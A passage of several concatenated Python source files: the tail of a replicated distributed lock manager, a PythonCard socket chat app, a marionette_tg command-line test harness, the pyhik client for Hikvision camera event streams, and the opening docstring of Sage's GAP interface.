if currentTime - lockTime > self.__autoUnlockTime:
del self.__locks[lockID]
continue
if lockClientID == clientID:
self.__locks[lockID] = (clientID, currentTime)
@replicated
def release(self, lockID, clientID):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None and existingLock[0] == clientID:
del self.__locks[lockID]
def isAcquired(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if existingLock[0] == clientID:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
class ReplLockManager(object):
def __init__(self, autoUnlockTime, selfID = None):
"""Replicated Lock Manager. Allow to acquire / release distributed locks.
:param autoUnlockTime: lock will be released automatically
if no response from holder for more than autoUnlockTime seconds
:type autoUnlockTime: float
:param selfID: (optional) - unique id of current lock holder.
:type selfID: str
"""
self.__lockImpl = _ReplLockManagerImpl(autoUnlockTime)
if selfID is None:
selfID = '%s:%d:%d' % (socket.gethostname(), os.getpid(), id(self))
self.__selfID = selfID
self.__autoUnlockTime = autoUnlockTime
self.__mainThread = threading.current_thread()
self.__initialised = threading.Event()
self.__destroying = False
self.__lastProlongateTime = 0
self.__thread = threading.Thread(target=ReplLockManager._autoAcquireThread, args=(weakref.proxy(self),))
self.__thread.start()
        self.__initialised.wait()
def _consumer(self):
return self.__lockImpl
def destroy(self):
"""Destroy should be called before destroying ReplLockManager"""
self.__destroying = True
def _autoAcquireThread(self):
self.__initialised.set()
try:
while True:
if not self.__mainThread.is_alive():
break
if self.__destroying:
break
time.sleep(0.1)
if time.time() - self.__lastProlongateTime < float(self.__autoUnlockTime) / 4.0:
continue
syncObj = self.__lockImpl._syncObj
if syncObj is None:
continue
if syncObj._getLeader() is not None:
self.__lastProlongateTime = time.time()
self.__lockImpl.prolongate(self.__selfID, time.time())
except ReferenceError:
pass
def tryAcquire(self, lockID, callback=None, sync=False, timeout=None):
"""Attempt to acquire lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is acquired or failed to acquire.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
:return True if acquired, False - somebody else already acquired lock
"""
# try to acquire the lock and check if the lock was actually acquired
return self.__lockImpl.acquire(lockID, self.__selfID, time.time(), callback=callback, sync=sync, timeout=timeout) \
and self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def isAcquired(self, lockID):
"""Check if lock is acquired by ourselves.
:param lockID: unique lock identifier.
:type lockID: str
:return True if lock is acquired by ourselves.
"""
return self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def release(self, lockID, callback=None, sync=False, timeout=None):
"""
Release previously-acquired lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is released or failed to release.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
"""
self.__lockImpl.release(lockID, self.__selfID, callback=callback, sync=sync, timeout=timeout)
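# A minimal usage sketch (an addition, not part of the original module),
# assuming a pysyncobj-style SyncObj class that accepts a 'consumers' list and
# that the node addresses below are reachable; adjust them for your cluster.
if __name__ == '__main__':
    from pysyncobj import SyncObj
    counter = ReplCounter()
    lockManager = ReplLockManager(autoUnlockTime=30.0)
    syncObj = SyncObj('127.0.0.1:4321', ['127.0.0.1:4322', '127.0.0.1:4323'],
                      consumers=[counter, lockManager])
    # Replicated calls accept the callback/sync/timeout kwargs added by
    # @replicated; sync=True waits until the change is committed by the cluster.
    counter.inc(sync=True)
    print(counter.get())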
|
chat.py
|
#!/usr/bin/python
"""
__version__ = "$Revision: 1.6 $"
__date__ = "$Date: 2004/05/05 16:53:25 $"
"""
from PythonCard import model
import threading
import Queue
import wx
# EchoServer derived
# from echo server example in Programming Python by Mark Lutz
# get socket constructor and constants
import socket
# server machine, '' means local host
myHost = ''
# listen on a non-reserved port number
myPort = 50007
class EchoServer:
def __init__(self, parent):
self._parent = parent
self.keepRunning = 1
def server(self):
# make a TCP socket object
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind it to server port number
sockobj.bind((myHost, myPort))
# listen, allow 5 pending connects
sockobj.listen(5)
# listen until process killed
while self.keepRunning:
#print 'outer loop'
connection, address = sockobj.accept() # wait for next client connect
#print 'Server connected by', address # connection is a new socket
while self.keepRunning:
#print 'inner loop'
# read next line on client socket
data = connection.recv(1024)
if not data: break
self._parent.msgQueue.put(data)
wx.WakeUpIdle()
connection.close()
# The same port as used by the server
PORT = myPort
def echoSend(host, port, txt):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(txt)
s.close()
class Chat(model.Background):
def on_initialize(self, event):
self.msgQueue = Queue.Queue()
self.components.fldYourIPAddress.text = socket.gethostbyname(socket.gethostname())
self.echoServer = EchoServer(self)
self.thread = threading.Thread(target = self.echoServer.server)
# I think this allows Python to kill the thread when we quit wxPython
# setDaemon must be called before start
self.thread.setDaemon(1)
self.thread.start()
def on_idle(self, event):
if not self.msgQueue.empty():
msg = self.msgQueue.get()
self.doDisplayMsgReceived(msg)
event.RequestMore()
def doDisplayMsgReceived(self, data):
if data is not None:
self.components.fldTranscript.appendText(data + '\n')
else:
pass
def on_btnSend_mouseClick(self, event):
#print "btnSend", self.components.fldSendAddresses.text, PORT, self.components.fldInput.text
txt = self.components.fldNickname.text + \
" (" + self.components.fldYourIPAddress.text + "): " + \
self.components.fldInput.text
addresses = self.components.fldSendAddresses.text.split(',')
#print addresses
for ip in addresses:
echoSend(ip.strip(), PORT, txt)
self.components.fldTranscript.appendText(txt + '\n')
self.components.fldInput.text = ""
#print "after send"
def on_close(self, event):
self.echoServer.keepRunning = 0
event.skip()
if __name__ == '__main__':
app = model.Application(Chat)
app.MainLoop()
|
cli_tests.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import time
import httplib
import unittest
import threading
sys.path.append('.')
import marionette_tg.conf
def execute(cmd):
os.system(cmd)
def exec_download():
client_listen_ip = marionette_tg.conf.get("client.client_ip")
conn = httplib.HTTPConnection(
client_listen_ip, 18079, False, timeout=30)
conn.request("GET", "/")
response = conn.getresponse()
actual_response = response.read()
conn.close()
expected_response = ''
for x in range(2**18):
expected_response += '_' + str(x)
assert actual_response == expected_response
return actual_response
class ParametrizedTestCase(unittest.TestCase):
""" TestCase classes that want to be parametrized should
inherit from this class.
"""
def __init__(self, methodName='runTest', param=None):
super(ParametrizedTestCase, self).__init__(methodName)
self.param = param
@staticmethod
def parametrize(testcase_klass, param=None):
""" Create a suite containing all tests taken from the given
subclass, passing them the parameter 'param'.
"""
testloader = unittest.TestLoader()
testnames = testloader.getTestCaseNames(testcase_klass)
suite = unittest.TestSuite()
for name in testnames:
suite.addTest(testcase_klass(name, param=param))
return suite
class CliTest(ParametrizedTestCase):
def startservers(self, format):
client_listen_ip = marionette_tg.conf.get("client.client_ip")
server_proxy_ip = marionette_tg.conf.get("server.proxy_ip")
execute("./bin/httpserver --local_port 18081 &")
execute("./bin/marionette_server --proxy_ip %s --proxy_port 18081 --format %s &" %
(server_proxy_ip, format))
time.sleep(5)
execute("./bin/marionette_client --client_ip %s --client_port 18079 --format %s &" %
(client_listen_ip, format))
time.sleep(5)
def stopservers(self):
execute("pkill -9 -f marionette_client")
execute("pkill -9 -f marionette_server")
execute("pkill -9 -f httpserver")
def dodownload_serial(self):
exec_download()
def dodownload_parallel(self):
simultaneous = 2
threads = []
for j in range(simultaneous):
t = threading.Thread(target=exec_download)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
def test_cli_curl(self):
if self.param:
try:
format = self.param
self.startservers(format)
self.dodownload_serial()
self.dodownload_parallel()
except Exception as e:
                self.fail(e)
finally:
sys.stdout.write(format+' ')
sys.stdout.flush()
self.stopservers()
suite = unittest.TestSuite()
for param in [
'dummy',
'http_timings',
'ftp_simple_blocking',
'http_simple_blocking',
'http_simple_blocking:20150701', # tests in-band nego.
'http_simple_blocking:20150702', # tests in-band nego.
'http_squid_blocking',
'http_simple_nonblocking',
'http_probabilistic_blocking',
'http_simple_blocking_with_msg_lens',
'ssh_simple_nonblocking',
'smb_simple_nonblocking',
'http_active_probing',
'http_active_probing2',
'active_probing/http_apache_247',
'active_probing/ssh_openssh_661',
'active_probing/ftp_pureftpd_10']:
suite.addTest(ParametrizedTestCase.parametrize(CliTest, param=param))
testresult = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not testresult.wasSuccessful())
|
hikvision.py
|
"""
pyhik.hikvision
~~~~~~~~~~~~~~~~~~~~
Provides api for Hikvision events
Copyright (c) 2016-2020 John Mihalic <https://github.com/mezz64>
Licensed under the MIT license.
Based on the following api documentation:
System:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-IPMD%20Service.pdf
Imaging:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-Image%20Service.pdf
"""
import time
import datetime
import logging
import uuid
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import threading
import requests
from requests.auth import HTTPDigestAuth
# Make pydispatcher optional to support legacy implementations
# New usage should implement the event_callback
try:
from pydispatch import dispatcher
except ImportError:
dispatcher = None
from pyhik.watchdog import Watchdog
from pyhik.constants import (
DEFAULT_PORT, DEFAULT_HEADERS, XML_NAMESPACE, SENSOR_MAP,
CAM_DEVICE, NVR_DEVICE, CONNECT_TIMEOUT, READ_TIMEOUT, CONTEXT_INFO,
CONTEXT_TRIG, CONTEXT_MOTION, CONTEXT_ALERT, CHANNEL_NAMES, ID_TYPES,
__version__)
_LOGGING = logging.getLogger(__name__)
# Hide nuisance requests logging
logging.getLogger('urllib3').setLevel(logging.ERROR)
"""
Things still to do:
- Support status of day/night and switching
IR switch URL:
http://X.X.X.X/ISAPI/Image/channels/1/ircutFilter
report IR status and allow
"""
# pylint: disable=too-many-instance-attributes
class HikCamera(object):
"""Creates a new Hikvision api device."""
def __init__(self, host=None, port=DEFAULT_PORT,
usr=None, pwd=None):
"""Initialize device."""
_LOGGING.debug("pyHik %s initializing new hikvision device at: %s",
__version__, host)
self.event_states = {}
self.watchdog = Watchdog(300.0, self.watchdog_handler)
if not host:
_LOGGING.error('Host not specified! Cannot continue.')
return
self.host = host
self.usr = usr
self.pwd = pwd
self.cam_id = 0
self.name = ''
self.device_type = None
self.motion_detection = None
self._motion_detection_xml = None
self.root_url = '{}:{}'.format(host, port)
self.namespace = {
CONTEXT_INFO: None,
CONTEXT_TRIG: None,
CONTEXT_ALERT: None,
CONTEXT_MOTION: None
}
# Build requests session for main thread calls
# Default to basic authentication. It will change to digest inside
# get_device_info if basic fails
self.hik_request = requests.Session()
self.hik_request.auth = (usr, pwd)
self.hik_request.headers.update(DEFAULT_HEADERS)
# Define event stream processing thread
self.kill_thrd = threading.Event()
self.reset_thrd = threading.Event()
self.thrd = threading.Thread(
target=self.alert_stream, args=(self.reset_thrd, self.kill_thrd,))
self.thrd.daemon = False
# Callbacks
self._updateCallbacks = []
self.initialize()
@property
def get_id(self):
"""Returns unique camera/nvr identifier."""
return self.cam_id
@property
def get_name(self):
"""Return camera/nvr name."""
return self.name
@property
def get_type(self):
"""Return device type."""
return self.device_type
@property
def current_event_states(self):
"""Return Event states dictionary"""
return self.event_states
@property
def current_motion_detection_state(self):
"""Return current state of motion detection property"""
return self.motion_detection
def get_motion_detection(self):
"""Fetch current motion state from camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch MotionDetection, error: %s', err)
self.motion_detection = None
return self.motion_detection
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
self.motion_detection = None
return self.motion_detection
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch motion detection.')
self.motion_detection = None
return self.motion_detection
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_MOTION)
enabled = tree.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is not None:
self._motion_detection_xml = tree
self.motion_detection = {'true': True, 'false': False}[enabled.text]
return self.motion_detection
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
self.motion_detection = None
return self.motion_detection
def enable_motion_detection(self):
"""Enable motion detection"""
self._set_motion_detection(True)
def disable_motion_detection(self):
"""Disable motion detection"""
self._set_motion_detection(False)
def _set_motion_detection(self, enable):
"""Set desired motion detection state on camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
enabled = self._motion_detection_xml.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is None:
_LOGGING.error("Couldn't find 'enabled' in the xml")
_LOGGING.error('XML: %s', ET.tostring(self._motion_detection_xml))
return
enabled.text = 'true' if enable else 'false'
xml = ET.tostring(self._motion_detection_xml)
try:
response = self.hik_request.put(url, data=xml, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to set MotionDetection, error: %s', err)
return
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.error('Unable to set motion detection: %s', response.text)
self.motion_detection = enable
def add_update_callback(self, callback, sensor):
"""Register as callback for when a matching device sensor changes."""
self._updateCallbacks.append([callback, sensor])
_LOGGING.debug('Added update callback to %s on %s', callback, sensor)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, sensor in self._updateCallbacks:
if sensor == msg:
_LOGGING.debug('Update callback %s for sensor %s',
callback, sensor)
callback(msg)
def element_query(self, element, context):
"""Build tree query for a given element and context."""
if context == CONTEXT_INFO:
return '{%s}%s' % (self.namespace[CONTEXT_INFO], element)
elif context == CONTEXT_TRIG:
return '{%s}%s' % (self.namespace[CONTEXT_TRIG], element)
elif context == CONTEXT_ALERT:
return '{%s}%s' % (self.namespace[CONTEXT_ALERT], element)
elif context == CONTEXT_MOTION:
return '{%s}%s' % (self.namespace[CONTEXT_MOTION], element)
else:
return '{%s}%s' % (XML_NAMESPACE, element)
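    # For a device using the standard ISAPI schema, a call such as
    # element_query('deviceName', CONTEXT_INFO) typically yields a Clark-notation
    # tag like '{http://www.hikvision.com/ver20/XMLSchema}deviceName'
    # (illustrative; the actual namespace is discovered by fetch_namespace below).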
def fetch_namespace(self, tree, context):
"""Determine proper namespace to find given element."""
if context == CONTEXT_INFO:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_INFO] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device info namespace: %s', self.namespace[CONTEXT_INFO])
elif context == CONTEXT_TRIG:
try:
# For triggers we *typically* only care about the sub-namespace
nmsp = tree[0][1].tag.split('}')[0].strip('{')
except IndexError:
                # If we get an IndexError, check the top level
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_TRIG] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device triggers namespace: %s', self.namespace[CONTEXT_TRIG])
elif context == CONTEXT_ALERT:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_ALERT] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device alerts namespace: %s', self.namespace[CONTEXT_ALERT])
elif context == CONTEXT_MOTION:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_MOTION] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device motion namespace: %s', self.namespace[CONTEXT_MOTION])
def initialize(self):
"""Initialize deviceInfo and available events."""
device_info = self.get_device_info()
if device_info is None:
self.name = None
self.cam_id = None
self.event_states = None
return
for key in device_info:
if key == 'deviceName':
self.name = device_info[key]
elif key == 'deviceID':
if len(device_info[key]) > 10:
self.cam_id = device_info[key]
else:
self.cam_id = uuid.uuid4()
events_available = self.get_event_triggers()
if events_available:
for event, channel_list in events_available.items():
for channel in channel_list:
try:
self.event_states.setdefault(
SENSOR_MAP[event.lower()], []).append(
[False, channel, 0, datetime.datetime.now()])
except KeyError:
# Sensor type doesn't have a known friendly name
# We can't reliably handle it at this time...
_LOGGING.warning(
'Sensor type "%s" is unsupported.', event)
_LOGGING.debug('Initialized Dictionary: %s', self.event_states)
else:
_LOGGING.debug('No Events available in dictionary.')
self.get_motion_detection()
def get_device_info(self):
"""Parse deviceInfo into dictionary."""
device_info = {}
url = '%s/ISAPI/System/deviceInfo' % self.root_url
using_digest = False
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
if response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
if response.status_code == requests.codes.not_found:
# Try alternate URL for deviceInfo
_LOGGING.debug('Using alternate deviceInfo URL.')
url = '%s/System/deviceInfo' % self.root_url
response = self.hik_request.get(url)
# There seems to be a difference between cameras and NVRs: they can't
# agree on whether to return 404 or 401 first
if not using_digest and response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch deviceInfo, error: %s', err)
return None
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return None
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch device info.')
return None
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_INFO)
for item in tree:
tag = item.tag.split('}')[1]
device_info[tag] = item.text
return device_info
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
return None
def get_event_triggers(self):
"""
Returns dict of supported events.
Key = Event Type
List = Channels that have that event activated
"""
events = {}
nvrflag = False
event_xml = []
# different firmware versions support different endpoints.
urls = (
'%s/ISAPI/Event/triggers', # ISAPI v2.0+
'%s/Event/triggers', # Old devices?
)
response = {}
for url in urls:
try:
response = self.hik_request.get(url % self.root_url, timeout=CONNECT_TIMEOUT)
if response.status_code != requests.codes.ok:
# Try next alternate URL for triggers
_LOGGING.debug('Trying alternate triggers URL.')
continue
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch events, error: %s', err)
return None
break
else:
_LOGGING.error('Unable to fetch events. '
'Device firmware may be old/bad.')
return None
# pylint: disable=too-many-nested-blocks
try:
content = ET.fromstring(response.text)
self.fetch_namespace(content, CONTEXT_TRIG)
if content[0].find(self.element_query('EventTrigger', CONTEXT_TRIG)) is not None:
event_xml = content[0].findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
elif content.find(self.element_query('EventTrigger', CONTEXT_TRIG)) is not None:
# This is either an NVR or a rebadged camera
event_xml = content.findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
for eventtrigger in event_xml:
ettype = eventtrigger.find(self.element_query('eventType', CONTEXT_TRIG))
# Catch empty XML definitions
if ettype is None:
break
etnotify = eventtrigger.find(
self.element_query('EventTriggerNotificationList', CONTEXT_TRIG))
etchannel = None
etchannel_num = 0
for node_name in CHANNEL_NAMES:
etchannel = eventtrigger.find(
self.element_query(node_name, CONTEXT_TRIG))
if etchannel is not None:
try:
# Need to make sure this is actually a number
etchannel_num = int(etchannel.text)
if etchannel_num > 1:
# Must be an nvr
nvrflag = True
break
except ValueError:
# Field value is not an integer
pass
if etnotify:
for notifytrigger in etnotify:
ntype = notifytrigger.find(
self.element_query('notificationMethod', CONTEXT_TRIG))
if ntype.text in ('center', 'HTTP'):
# If we got this far we found an event that we want
# to track.
events.setdefault(ettype.text, []) \
.append(etchannel_num)
except (AttributeError, ET.ParseError) as err:
_LOGGING.error(
'There was a problem finding an element: %s', err)
return None
if nvrflag:
self.device_type = NVR_DEVICE
else:
self.device_type = CAM_DEVICE
_LOGGING.debug('Processed %s as %s Device.',
self.cam_id, self.device_type)
_LOGGING.debug('Found events: %s', events)
self.hik_request.close()
return events
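# --- Illustrative return value (not part of the original module) ---
# get_event_triggers() maps each raw event type reported by the device to the
# list of channels it is enabled on. Event names and channels below are
# hypothetical:
_EXAMPLE_TRIGGERS = {
    'VMD': [1],            # motion detection on channel 1
    'linedetection': [1],  # line crossing on channel 1
}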
def watchdog_handler(self):
"""Take care of threads if wachdog expires."""
_LOGGING.debug('%s Watchdog expired. Resetting connection.', self.name)
self.watchdog.stop()
self.reset_thrd.set()
def disconnect(self):
"""Disconnect from event stream."""
_LOGGING.debug('Disconnecting from stream: %s', self.name)
self.kill_thrd.set()
self.thrd.join()
_LOGGING.debug('Event stream thread for %s is stopped', self.name)
self.kill_thrd.clear()
def start_stream(self):
"""Start thread to process event stream."""
# self.watchdog.start()
self.thrd.start()
def alert_stream(self, reset_event, kill_event):
"""Open event stream."""
_LOGGING.debug('Stream Thread Started: %s, %s', self.name, self.cam_id)
start_event = False
parse_string = ""
fail_count = 0
url = '%s/ISAPI/Event/notification/alertStream' % self.root_url
# pylint: disable=too-many-nested-blocks
while True:
try:
stream = self.hik_request.get(url, stream=True,
timeout=(CONNECT_TIMEOUT,
READ_TIMEOUT))
if stream.status_code == requests.codes.not_found:
# Try alternate URL for stream
url = '%s/Event/notification/alertStream' % self.root_url
stream = self.hik_request.get(url, stream=True)
if stream.status_code != requests.codes.ok:
raise ValueError('Connection unsuccessful.')
else:
_LOGGING.debug('%s Connection Successful.', self.name)
fail_count = 0
self.watchdog.start()
for line in stream.iter_lines():
# _LOGGING.debug('Processing line from %s', self.name)
# filter out keep-alive new lines
if line:
str_line = line.decode("utf-8", "ignore")
# New events start with --boundary
if str_line.find('<EventNotificationAlert') != -1:
# Start of event message
start_event = True
parse_string = str_line
elif str_line.find('</EventNotificationAlert>') != -1:
# Message end found
parse_string += str_line
start_event = False
if parse_string:
try:
tree = ET.fromstring(parse_string)
self.process_stream(tree)
self.update_stale()
except ET.ParseError as err:
_LOGGING.warning('XML parse error in stream: %s', err)
parse_string = ""
else:
if start_event:
parse_string += str_line
if kill_event.is_set():
# We were asked to stop the thread so let's do so.
break
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
if kill_event.is_set():
# We were asked to stop the thread so let's do so.
_LOGGING.debug('Stopping event stream thread for %s',
self.name)
self.watchdog.stop()
self.hik_request.close()
return
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
except (ValueError,
requests.exceptions.ConnectionError,
requests.exceptions.ChunkedEncodingError) as err:
fail_count += 1
reset_event.clear()
_LOGGING.warning('%s Connection Failed (count=%d). Waiting %ss. Err: %s',
self.name, fail_count, (fail_count * 5) + 5, err)
parse_string = ""
self.watchdog.stop()
self.hik_request.close()
time.sleep(5)
self.update_stale()
time.sleep(fail_count * 5)
continue
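# --- Illustrative stream payload (not part of the original module) ---
# alert_stream() accumulates multipart chunks into one XML document per event
# and hands it to process_stream(). A hypothetical, trimmed payload looks
# roughly like this; only the elements referenced below (eventType,
# eventState, activePostCount and one of the channel-id tags) matter here:
#
#   <EventNotificationAlert version="2.0" xmlns="...">
#     <channelID>1</channelID>
#     <eventType>VMD</eventType>
#     <eventState>active</eventState>
#     <activePostCount>1</activePostCount>
#   </EventNotificationAlert>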
def process_stream(self, tree):
"""Process incoming event stream packets."""
if not self.namespace[CONTEXT_ALERT]:
self.fetch_namespace(tree, CONTEXT_ALERT)
try:
etype = SENSOR_MAP[tree.find(
self.element_query('eventType', CONTEXT_ALERT)).text.lower()]
estate = tree.find(
self.element_query('eventState', CONTEXT_ALERT)).text
for idtype in ID_TYPES:
echid = tree.find(self.element_query(idtype, CONTEXT_ALERT))
if echid is not None:
try:
# Need to make sure this is actually a number
echid = int(echid.text)
break
except (ValueError, TypeError) as err:
# Field value is not an integer, or is blank
pass
ecount = tree.find(
self.element_query('activePostCount', CONTEXT_ALERT)).text
except (AttributeError, KeyError, IndexError) as err:
_LOGGING.error('Problem finding attribute: %s', err)
return
# Take care of keep-alive
if len(etype) > 0 and etype == 'Video Loss':
self.watchdog.pet()
# Track state if it's in the event list.
if len(etype) > 0:
state = self.fetch_attributes(etype, echid)
if state:
# Determine if state has changed
# If so, publish, otherwise do nothing
estate = (estate == 'active')
old_state = state[0]
attr = [estate, echid, int(ecount),
datetime.datetime.now()]
self.update_attributes(etype, echid, attr)
if estate != old_state:
self.publish_changes(etype, echid)
self.watchdog.pet()
def update_stale(self):
"""Update stale active statuses"""
# Some events don't post an inactive XML, only active.
# If we don't get an active update for 5 seconds we can
# assume the event is no longer active and update accordingly.
for etype, echannels in self.event_states.items():
for eprop in echannels:
if eprop[3] is not None:
sec_elap = ((datetime.datetime.now()-eprop[3])
.total_seconds())
# print('Seconds since last update: {}'.format(sec_elap))
if sec_elap > 5 and eprop[0] is True:
_LOGGING.debug('Updating stale event %s on CH(%s)',
etype, eprop[1])
attr = [False, eprop[1], eprop[2],
datetime.datetime.now()]
self.update_attributes(etype, eprop[1], attr)
self.publish_changes(etype, eprop[1])
def publish_changes(self, etype, echid):
"""Post updates for specified event type."""
_LOGGING.debug('%s Update: %s, %s',
self.name, etype, self.fetch_attributes(etype, echid))
signal = 'ValueChanged.{}'.format(self.cam_id)
sender = '{}.{}'.format(etype, echid)
if dispatcher:
dispatcher.send(signal=signal, sender=sender)
self._do_update_callback('{}.{}.{}'.format(self.cam_id, etype, echid))
def fetch_attributes(self, event, channel):
"""Returns attribute list for a given event/channel."""
try:
for sensor in self.event_states[event]:
if sensor[1] == int(channel):
return sensor
except KeyError:
return None
def update_attributes(self, event, channel, attr):
"""Update attribute list for current event/channel."""
try:
for i, sensor in enumerate(self.event_states[event]):
if sensor[1] == int(channel):
self.event_states[event][i] = attr
except KeyError:
_LOGGING.debug('Error updating attributes for: (%s, %s)',
event, channel)
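# --- Illustrative end-to-end usage (not part of the original module) ---
# Rough sketch of driving this event client, assuming the enclosing class is
# exposed as `HikCamera` and takes (url, port, usr, pwd); both the class name
# and the constructor signature are assumptions, not shown in this excerpt:
#
#   cam = HikCamera('http://192.0.2.10', 80, 'admin', 'secret')
#   cam.initialize()                       # fetch device info and triggers
#   cam.add_update_callback(print, '{}.Motion.1'.format(cam.cam_id))
#   cam.start_stream()                     # spawn the alertStream thread
#   ...
#   cam.disconnect()                       # stop the thread cleanly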
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x`` and ``y`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now ``x`` and ``y`` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, by simply defining a
``_gap_init_`` member function that returns a string that, when
evaluated in GAP, constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
